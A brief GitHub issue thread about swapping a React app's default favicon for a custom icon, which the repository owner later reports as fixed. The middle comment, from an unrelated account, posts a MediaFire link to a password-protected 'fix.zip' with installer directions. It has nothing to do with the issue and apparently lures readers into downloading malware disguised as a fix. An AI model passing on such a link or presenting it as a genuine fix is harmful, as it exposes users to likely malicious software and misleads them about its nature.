### ISSUE TITLE
Web Icon

### ISSUE THREAD

**Issue by zeri27** [zeri27/ZA-PRFL#26]
add persnalized website icon to replace default react fav icon

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zeri27** [comment]
web icon appears to be removed successfully. Natively still opens it due to favicon being stored in the cache, but on private windows, it's gone: meaning problem solved.
